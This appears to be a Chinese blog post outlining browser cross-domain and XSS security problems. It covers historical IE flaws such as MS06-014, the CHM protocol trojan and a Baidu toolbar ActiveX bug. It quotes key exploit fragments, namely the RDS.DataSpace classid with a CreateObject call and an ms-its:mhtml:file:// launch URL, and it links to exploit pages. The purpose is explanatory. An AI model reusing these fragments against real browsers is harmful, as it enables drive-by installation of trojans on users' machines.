浏览器的跨域安全问题

 浏览器的安全发展方向

 
现在浏览器安全的噱头:防钓鱼、防恶意脚本、防溢出型网页木马。
目前薄弱的一块:跨站脚本漏洞、跨域脚本漏洞
未来的浏览器对于跨域安全的加强升级将是一个重点发展方向。
补充: IE8 开始添加 XSS Filter 功能 和跨域安全函数 toStaticHTML () 等。

  • 跨站和跨域漏洞的区别

跨站漏洞是 WEB 程序的漏洞,黑客可以在远程的站点域内任意页面写入脚本内容运行。
跨域漏洞是浏览器的漏洞 ,黑客可以在本地域、远程域获得相应的权限,然后利用得到的权限运行脚本发起攻击。

  • 跨站脚本漏洞的本质
  • 持久型 XSS
  • 非持久型 XSS
  • DOM XSS

从 IE8 的安全更新可以看出,虽然 XSS 漏洞是 WEB 程序漏洞,但仍属于浏览器的跨域安全问题范围。

  • 跨站脚本漏洞能做到什么

传统的跨站脚本漏洞,劫持用户和 WEB 程序之间的会话或钓鱼攻击。
跨站脚本漏洞是跨域脚本漏洞的一个子集,浏览器底层接口对于同一个域内的脚本安全限制很小,可以导致跨页面的脚本注入。

  • 本地域的脚本权限

本地域的脚本权限按文件的权限分为两种:可执行文件权限和 HTML 文档权限。
HTML 文档权限可以使用 XmlHttp 对象读取本地的任意文件,利用系统的安全特性可以运行本地任意可执行文件。
HTA,VBS 等可执行文件权限可以使用 WshShell 对象等做任何事情。

  • 跨域漏洞的本质

1.Ms06014 漏洞 ,利用 DataSpace 对象 , 获取了本地域可执行文件权限运行脚本。
2.CHM 木马,利用浏览器协议漏洞,获取本地域 HTML 文档权限运行木马。
3. 百度超级搜霸漏洞, ActiveX 组件设计没有考虑域安全。
4. 利用软件的设计缺陷或者浏览器漏洞,在本地域的 HTML 文档注入脚本运行,获取相应的权限。

  • Ms06014 漏洞

http://www.milw0rm.com/exploits/2052
漏洞关键:
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP“
Set x = df.CreateObject(str,"")

  • CHM 木马

http://www.securityfocus.com/bid/9658/exploit
IE 未名 CHM 协议漏洞
ms-its:mhtml:file://C:ss.MHT!http://www.example.com//chm.chm::/files/launch.htm
mk:@MSITStore: mk-its: its: 等帮助文件协议存在跨域漏洞。

  • 百度超级搜霸漏洞

http://www.xfocus.net/articles/200708/933.html
ActiveX 组件设计没有考虑域安全,使用组件自身的 UPDATE 功能,下载运行木马。

IE6 0DAY 和第三方浏览器跨域漏洞
IE6 0DAY
IE 内核的安全接口对伪协议的限制有疏漏。
第三方浏览器跨域漏洞
软件自身的设计或功能出现缺陷。
演示跨域漏洞导致的浏览器劫持攻击。

总结
现在浏览器还没能防住所有的跨域攻击。
1. 跨站攻击脚本非传统的恶意脚本。
2. 浏览器底层接口漏洞,大部分都是 0DAY 漏洞。
3. 第三方浏览器设计上的疏漏导致的安全问题。
4. 部分问题不被重视,还未达到大规模的利用程度。
 

你可能感兴趣的:(浏览器,职场,信息安全,休闲)